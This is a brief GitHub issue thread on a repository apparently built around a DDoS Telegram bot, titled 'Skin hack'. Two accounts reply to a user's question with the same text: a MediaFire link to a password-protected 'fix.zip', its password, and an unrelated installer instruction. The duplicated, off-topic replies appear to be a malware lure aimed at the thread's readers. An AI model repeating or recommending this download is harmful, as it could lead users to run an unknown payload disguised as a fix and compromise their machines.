### ISSUE TITLE
Skin hack 

### ISSUE THREAD

**Issue by dontlookbackk** [ansh5025/DDOS_TelegramBot#7]
Bro what are the steps after downloading the file

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
